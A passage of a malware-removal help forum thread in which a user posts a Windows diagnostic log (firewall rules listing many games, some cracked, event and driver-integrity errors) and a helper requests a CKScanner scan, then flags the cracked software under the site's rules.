FirewallRules: [{E9835C84-696D-418C-8B99-ADE9F33CD05E}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe

FirewallRules: [TCP Query User{441CC1D9-CABF-4C9B-8F92-B66276FA97FF}C:\program files (x86)\repack by s.l\spintires\launcher.exe] => (Allow) C:\program files (x86)\repack by s.l\spintires\launcher.exe

FirewallRules: [UDP Query User{AFB9A356-C652-4859-AC2D-F1E7B6A0F06B}C:\program files (x86)\repack by s.l\spintires\launcher.exe] => (Allow) C:\program files (x86)\repack by s.l\spintires\launcher.exe

FirewallRules: [TCP Query User{EC646AD1-5D56-41D2-926F-C12EA6261B6F}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe

FirewallRules: [UDP Query User{17D0503A-5B06-4918-A320-CB58C49EC9F5}C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe] => (Allow) C:\users\hp\downloads\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm\7 days to die\7daystodie.exe

FirewallRules: [TCP Query User{3E3653FB-F2AB-4E49-981B-BC7652AC5D96}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe

FirewallRules: [UDP Query User{2BCB61E3-55D6-4A18-BFAF-3259606EFB0D}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre64\bin\java.exe

FirewallRules: [TCP Query User{3822C677-6992-4900-AE6A-789C7B3D610A}C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe

FirewallRules: [UDP Query User{729F518E-2172-4AF2-A625-5DDB66A1318C}C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\win64\aces.exe

FirewallRules: [TCP Query User{9145617F-9A87-4EC9-96D7-61DC88A0B3AA}C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe

FirewallRules: [UDP Query User{1DBD55A9-434E-44B6-B95E-626ACAC6C68C}C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe

FirewallRules: [TCP Query User{9D4BEF11-6C5D-4188-8EE0-809ABFA64121}C:\program files\strogino cs portal\garrys mod\hl2.exe] => (Allow) C:\program files\strogino cs portal\garrys mod\hl2.exe

FirewallRules: [UDP Query User{3C2E631E-9993-43F8-8CA4-9DB4D57A9C8A}C:\program files\strogino cs portal\garrys mod\hl2.exe] => (Allow) C:\program files\strogino cs portal\garrys mod\hl2.exe

FirewallRules: [TCP Query User{23049537-345E-49E4-81F7-7F7208582A6F}C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe] => (Allow) C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe

FirewallRules: [UDP Query User{682CAF12-DAA5-457A-AC7A-5608C4A6A8F8}C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe] => (Allow) C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe

FirewallRules: [{6199E943-BD95-4404-9F5C-CB98B6795C82}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe

FirewallRules: [{12CFF736-4509-4656-A63A-5A335B9C9E6D}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe

FirewallRules: [TCP Query User{6279ECB1-93CB-4DB6-9241-A56B0D65AAC2}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Allow) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe

FirewallRules: [UDP Query User{3B26002E-C2A1-406F-A8F8-D34AA6FC865D}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Allow) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe

FirewallRules: [TCP Query User{2358DAF6-5B72-40A1-B1CA-289285EF57E4}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Block) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe

FirewallRules: [UDP Query User{98626F0A-4AB3-4F44-9DA0-061F4A9B9051}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Block) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe

FirewallRules: [{CF5A6A3D-B63C-4355-8AAE-3CD4FB43C095}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3.exe

FirewallRules: [{C0B968E3-B62A-4EBA-8E08-5C46A97AB7AF}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3.exe

FirewallRules: [{FE5DDD9A-0167-4DA2-BA44-A5D1D5F76663}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3_d3d11.exe

FirewallRules: [{B49D92AC-3633-450D-A5FC-57947761C231}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3_d3d11.exe

FirewallRules: [{754473EF-15C8-49B8-9276-670737590704}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Updater.exe

FirewallRules: [{92332ADD-4121-4F3B-B11D-1E162442325D}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Updater.exe

FirewallRules: [{3C2DAF21-42E5-4231-ACA7-C55C1F5EB4A3}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Editor.exe

FirewallRules: [{A555EEF5-0B5D-47FA-8A66-618D19FDCF59}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Editor.exe

FirewallRules: [TCP Query User{988D249A-2BE6-49AE-A0EF-10582F8137AA}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Allow) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe

FirewallRules: [UDP Query User{DA7F5540-AEF2-4539-A9F7-763B01C89BCC}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Allow) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe

FirewallRules: [TCP Query User{B904D007-955B-4916-AC07-455185C1CBA1}C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe

FirewallRules: [UDP Query User{AD4B4F9E-0691-4533-81B7-A0B996EA51A1}C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe

FirewallRules: [TCP Query User{9E95F336-F5C5-40D7-861E-83FFF5B31736}C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe] => (Allow) C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe

FirewallRules: [UDP Query User{BC3A3A53-32E1-4AB3-A54F-A13AC20B39CC}C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe] => (Allow) C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe

FirewallRules: [{0871F91C-7DD5-424B-BE37-D2503FBD346F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid32.exe

FirewallRules: [{A756F288-9F2E-45E3-AB78-439D9088BE7B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid32.exe

FirewallRules: [{3F563ACF-01AC-4FCA-85ED-EA37B3A7F485}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid64.exe

FirewallRules: [{9379D05C-A530-4CE9-BAF0-A656004573AC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid64.exe

FirewallRules: [TCP Query User{35F69FFE-40DF-4386-AC10-8C0D36D081C6}C:\program files (x86)\pure pool\purepool.exe] => (Allow) C:\program files (x86)\pure pool\purepool.exe

FirewallRules: [UDP Query User{1A92EF19-97C2-4374-80ED-D2D7B7C99700}C:\program files (x86)\pure pool\purepool.exe] => (Allow) C:\program files (x86)\pure pool\purepool.exe

FirewallRules: [TCP Query User{E57231F6-21D9-4A64-8411-A4E0523EDBC1}C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe

FirewallRules: [UDP Query User{57E65EC3-AF57-4BCA-B676-8496D927DF02}C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe

FirewallRules: [TCP Query User{550FA9C1-B1E9-4129-81E8-27A356AF91FD}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe

FirewallRules: [UDP Query User{8875A142-BD97-4C56-B104-22508F4908B3}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe

FirewallRules: [{116CC472-97BB-45E1-9CA6-8D5CF09DFE59}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe

FirewallRules: [{BE10513A-94A9-418D-8A00-16A22A41FB64}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe

FirewallRules: [{E82DF90D-8295-4E1C-BC3D-BD07E981363A}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe

FirewallRules: [{07FE4630-9E5E-4153-83DD-FE613F95761C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe

FirewallRules: [TCP Query User{2104931F-149A-44C0-8F85-BDE3C80431BF}C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe] => (Allow) C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe

FirewallRules: [UDP Query User{B42278A1-1A63-493D-8F51-12BE515F244A}C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe] => (Allow) C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe

FirewallRules: [TCP Query User{3A9BEA93-7DA6-4947-B1AF-5474A0F818A7}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe

FirewallRules: [UDP Query User{B1D34AE1-BBD3-4ADD-9391-BC89E915C297}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe

FirewallRules: [TCP Query User{CC05D236-5285-44FE-BE3C-412687B6D67C}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe

FirewallRules: [UDP Query User{9BFEA870-D85D-4895-81D4-F4614FF6B0C6}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe

FirewallRules: [TCP Query User{4B3C5454-A646-45BF-A3F0-D4885D8A31CF}C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe] => (Allow) C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe

FirewallRules: [UDP Query User{597C47E7-0119-42AC-9391-8817E13875AB}C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe] => (Allow) C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe

FirewallRules: [TCP Query User{26DE1C8B-6AF7-43DA-9176-4C5D81BAC221}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe

FirewallRules: [UDP Query User{270B20B7-F928-4945-8B3F-8F0B924FD0B1}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe

FirewallRules: [TCP Query User{0853AF47-E170-4B7D-A706-8CD5BC1E0F7F}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe

FirewallRules: [UDP Query User{32EC7D15-A105-40A6-82C0-F9CBCD8D7773}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe

FirewallRules: [TCP Query User{E13477D5-D782-42C2-A699-34AFA7E078FB}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe

FirewallRules: [UDP Query User{B5350CE2-41EB-4585-AFD1-B48671A29251}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe

FirewallRules: [{3FB40881-A55B-4AB9-B43C-282E0EA45BA5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

FirewallRules: [{764C0F3F-D951-4B1B-B83B-B3FE23F920D7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe

FirewallRules: [{C0DDC65F-1D01-4A49-8C7F-E270F8D9E8A2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe

FirewallRules: [{2A59798D-9A43-46F5-A74D-1BFE9281B119}] => (Allow) C:\Windows\SysWOW64\SurfShield.exe

FirewallRules: [{E6A70596-328B-4304-A1E4-D66E080C28C4}] => (Allow) C:\Windows\system32\config\systemprofile\AppData\Local\BrowserAir\Application\BrowserairExec.exe

FirewallRules: [TCP Query User{26C5384F-A329-45CB-9871-71EF2DB92735}C:\users\hp\desktop\texture-studio-master\samp-server.exe] => (Allow) C:\users\hp\desktop\texture-studio-master\samp-server.exe

FirewallRules: [UDP Query User{636ADC8C-9A7E-4C6E-89D8-1D9006A3DF2F}C:\users\hp\desktop\texture-studio-master\samp-server.exe] => (Allow) C:\users\hp\desktop\texture-studio-master\samp-server.exe

 

==================== Restore Points =========================

 

19-04-2017 08:05:40 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215

19-04-2017 08:07:20 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215

19-04-2017 16:00:23 Windows Update

21-04-2017 07:49:48 Windows Update

21-04-2017 10:10:40 Windows Update

21-04-2017 20:00:16 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215

21-04-2017 20:00:59 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210

21-04-2017 20:01:28 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215

21-04-2017 20:01:56 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210

 

==================== Faulty Device Manager Devices =============

 

Name: 

Description: 

Class Guid: 

Manufacturer: 

Service: 

Problem: : The drivers for this device are not installed. (Code 28)

Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

 

Name: USB Input Device

Description: USB Input Device

Class Guid: {745a17a0-74d3-11d0-b6fe-00a0c90f57da}

Manufacturer: (Standard system devices)

Service: HidUsb

Problem: : This device cannot start. (Code10)

Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.

On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (04/22/2017 12:17:55 PM) (Source: Application Hang) (EventID: 1002) (User: )

Description: The program samp.exe version 0.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

 

Process ID: a24

 

Start Time: 01d2bb4944768846

 

Termination Time: 9

 

Application Path: C:\Games\Grand Theft Auto SA-MP\samp.exe

 

Report Id: 8fbf5fe5-273c-11e7-8046-acd1b80f54a8

 

Error: (04/22/2017 08:30:58 AM) (Source: EventSystem) (EventID: 4621) (User: )

Description: The COM+ Event System could not remove the EventSystem.EventSubscription object {F55E4282-CE4F-4785-B5C8-29D60709F8AF}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}.

Object name: SENS Logon Subscription

Object description: 

The HRESULT was 80070005.

 

Error: (04/21/2017 03:44:16 PM) (Source: Application Error) (EventID: 1005) (User: )

Description: Windows cannot access the file  for one of the following reasons:

there is a problem with the network connection, the disk that the file is stored on, or the storage

drivers installed on this computer; or the disk is missing.

Windows closed the program obs64.exe because of this error.

 

Program: obs64.exe

File: 

 

The error value is listed in the Additional Data section.

User Action

1. Open the file again.

This situation might be a temporary problem that corrects itself when the program runs again.

2.

If the file still cannot be accessed and

- It is on the network,

your network administrator should verify that there is not a problem with the network and that the server can be contacted.

- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.

3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.

4. If the problem persists, restore the file from a backup copy.

5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for

further assistance.

 

Additional Data

Error value: 00000000

Disk type: 0

 

Error: (04/21/2017 03:44:16 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4

Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff

Exception code: 0xc000001d

Fault offset: 0x0000000000095c01

Faulting process id: 0x17d4

Faulting application start time: 0x01d2ba9cfcb6a872

Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe

Faulting module path: C:\Windows\system32\MSVCR120.dll

Report Id: 3a6b596a-2690-11e7-b252-acd1b80f54a8

 

Error: (04/21/2017 03:43:36 PM) (Source: Application Error) (EventID: 1005) (User: )

Description: Windows cannot access the file  for one of the following reasons:

there is a problem with the network connection, the disk that the file is stored on, or the storage

drivers installed on this computer; or the disk is missing.

Windows closed the program obs64.exe because of this error.

 

Program: obs64.exe

File: 

 

The error value is listed in the Additional Data section.

User Action

1. Open the file again.

This situation might be a temporary problem that corrects itself when the program runs again.

2.

If the file still cannot be accessed and

- It is on the network,

your network administrator should verify that there is not a problem with the network and that the server can be contacted.

- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.

3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.

4. If the problem persists, restore the file from a backup copy.

5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for

further assistance.

 

Additional Data

Error value: 00000000

Disk type: 0

 

Error: (04/21/2017 03:43:36 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4

Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff

Exception code: 0xc000001d

Fault offset: 0x0000000000095c01

Faulting process id: 0x1cf8

Faulting application start time: 0x01d2ba9ce4e8b647

Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe

Faulting module path: C:\Windows\system32\MSVCR120.dll

Report Id: 229ca3ec-2690-11e7-b252-acd1b80f54a8

 

Error: (04/21/2017 03:43:14 PM) (Source: Application Error) (EventID: 1005) (User: )

Description: Windows cannot access the file  for one of the following reasons:

there is a problem with the network connection, the disk that the file is stored on, or the storage

drivers installed on this computer; or the disk is missing.

Windows closed the program obs64.exe because of this error.

 

Program: obs64.exe

File: 

 

The error value is listed in the Additional Data section.

User Action

1. Open the file again.

This situation might be a temporary problem that corrects itself when the program runs again.

2.

If the file still cannot be accessed and

- It is on the network,

your network administrator should verify that there is not a problem with the network and that the server can be contacted.

- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.

3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.

4. If the problem persists, restore the file from a backup copy.

5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for

further assistance.

 

Additional Data

Error value: 00000000

Disk type: 0

 

Error: (04/21/2017 03:43:14 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4

Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff

Exception code: 0xc000001d

Fault offset: 0x0000000000095c01

Faulting process id: 0x1eb0

Faulting application start time: 0x01d2ba9cd7e9f401

Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe

Faulting module path: C:\Windows\system32\MSVCR120.dll

Report Id: 15a4987f-2690-11e7-b252-acd1b80f54a8

 

Error: (04/21/2017 03:42:48 PM) (Source: Application Error) (EventID: 1005) (User: )

Description: Windows cannot access the file  for one of the following reasons:

there is a problem with the network connection, the disk that the file is stored on, or the storage

drivers installed on this computer; or the disk is missing.

Windows closed the program obs64.exe because of this error.

 

Program: obs64.exe

File: 

 

The error value is listed in the Additional Data section.

User Action

1. Open the file again.

This situation might be a temporary problem that corrects itself when the program runs again.

2.

If the file still cannot be accessed and

- It is on the network,

your network administrator should verify that there is not a problem with the network and that the server can be contacted.

- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.

3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.

4. If the problem persists, restore the file from a backup copy.

5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for

further assistance.

 

Additional Data

Error value: 00000000

Disk type: 0

 

Error: (04/21/2017 03:42:48 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4

Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff

Exception code: 0xc000001d

Fault offset: 0x0000000000095c01

Faulting process id: 0x1990

Faulting application start time: 0x01d2ba9cc7f7892b

Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe

Faulting module path: C:\Windows\system32\MSVCR120.dll

Report Id: 05aada8d-2690-11e7-b252-acd1b80f54a8

 

 

System errors:

=============

Error: (04/22/2017 08:57:10 AM) (Source: DCOM) (EventID: 10010) (User: )

Description: The server {820D63D5-8CFF-46DE-86AF-4997DEDD6DB5} did not register with DCOM within the required timeout.

 

Error: (04/22/2017 08:56:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The atksgt service failed to start due to the following error: 

Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

Error: (04/22/2017 08:50:27 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 40.

 

Error: (04/22/2017 08:50:26 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 40.

 

Error: (04/22/2017 08:50:26 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 40.

 

Error: (04/22/2017 08:50:25 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 40.

 

Error: (04/22/2017 08:50:24 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 40.

 

Error: (04/22/2017 08:50:24 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 40.

 

Error: (04/22/2017 08:50:22 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 40.

 

Error: (04/22/2017 08:50:21 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)

Description: The following fatal alert was received: 40.

 

 

CodeIntegrity:

===================================

  Date: 2017-04-22 08:56:34.806

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:56:34.806

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:48:57.263

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:48:57.247

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:38:27.771

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:38:27.771

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:32:26.489

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:32:26.489

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:03:04.835

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

  Date: 2017-04-22 08:03:04.833

  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

 

 

==================== Memory info =========================== 

 

Processor: Intel® Core™ i3-4005U CPU @ 1.70GHz

Percentage of memory in use: 50%

Total physical RAM: 4032.3 MB

Available physical RAM: 2009.74 MB

Total Virtual: 8062.74 MB

Available Virtual: 5440.58 MB

 

==================== Drives ================================

 

Drive c: () (Fixed) (Total:146.39 GB) (Free:87.1 GB) NTFS

Drive d: () (Fixed) (Total:319.28 GB) (Free:319.18 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 397A8933)

Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)

Partition 2: (Not Active) - (Size=146.4 GB) - (Type=07 NTFS)

Partition 3: (Not Active) - (Size=319.3 GB) - (Type=07 NTFS)

 

==================== End of Addition.txt ============================

Edited by Khazard, 22 April 2017 - 08:03 AM.

[pystryker]

Hello

Scan with CKScanner


Download CKScanner from here.

Important: Save it to your desktop.

Doubleclick CKScanner.exe and click Search For Files.(If you have Windows Vista / Windows 7 / Windows 8 please do a Right click on CKScanner.exe and select Run as Administrator.)

After a very short time, when the cursor hourglass disappears, click Save List To File.

A message box will verify that the file is saved.

Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.

[Khazard]

CKScanner 2.5 - Additional Security Risks - These are not necessarily bad

c:\games\grand theft auto sa-mp\data\decision\craig\crack1.ped

c:\program files (x86)\steam\steamapps\common\projectzomboid\zombie\erosion\categories\streetcracks$categorydata.class

c:\program files (x86)\steam\steamapps\common\projectzomboid\zombie\erosion\categories\streetcracks.class

c:\program files (x86)\steam\steamapps\common\projectzomboid\zombie\erosion\categories\wallcracks$categorydata.class

c:\program files (x86)\steam\steamapps\common\projectzomboid\zombie\erosion\categories\wallcracks.class

scanner sequence 3.BC.11.LEAPL0

 ----- EOF ----- 

[pystryker]

Cracked - Illegal Software

May I draw your attention to the Terms of Service, which you should have read before posting for help.
The section here explains why we bring this to your attention.

